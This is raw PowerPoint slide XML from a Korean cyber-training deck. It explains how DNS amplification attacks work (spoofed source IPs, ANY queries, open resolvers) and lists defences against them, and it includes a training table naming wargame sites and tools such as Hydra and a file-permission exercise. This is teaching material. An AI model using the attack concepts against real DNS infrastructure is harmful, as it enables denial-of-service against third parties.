                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>쿼리의 타입</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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>증폭 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(DNS Amplification)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a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 이용한 트래픽 증폭 공격이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>출발지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변조를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>통해 공격지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>response data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 트래픽을 향하게 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>질의에 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인증 절차가 없기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>때문에 변조가 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>마치 거울에 반사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>하듯이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 공격 하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>DRDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>종류</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 과정에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>타입의 쿼리를 이용하여 트래픽이 증폭 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격자 입장에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, Open DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 모두 좀비 피씨인 셈으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>효율적인 공격이 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256203139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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>증폭 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(DNS Amplification)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>방어방법은 다양하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>서버에서 재귀를 할 수 없도록 설정한다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>도메인 정보가 없는 질의에 대해 응답을 못 할 수도 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>resolve.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>파일에 외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>등록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>쿼리를 못하게 설정한다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 변조 필터링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(syn-cookie mechanism) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>보안장비를 배치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방화벽 설정을 통해 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>응답을 차단한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>매 초마다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>쿼리의 제한을 둔다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>내부 사용자의 주소만 재귀 쿼리를 허용한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235354293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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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8281"/>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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Unit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사이버전 실습체계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단위과제</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시나리오</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공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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FTZ</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a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>해커스쿨 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>FTZ</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US"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err="1"/>
                        <a:t>웹해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
                        <a:t>kr</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US"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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>단위과제</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Sys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시스템</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Mal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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Cip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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- R-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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BOF</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ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>gcc</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ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>gcc</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="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Hydra</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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Training/Unit/Sys/0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>실습 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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 </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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 접근 권한 설정</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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파일의 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쓰기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2)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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(r) = 4,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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(w) = 2, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>= 1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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읽기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쓰기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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18"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읽기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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>5(4 + 1)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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1) /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>-x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>2) /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일의 접근 권한 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-x-r-x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 755 /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l /bin/</a:t>
            </a:r>
            <a:r>
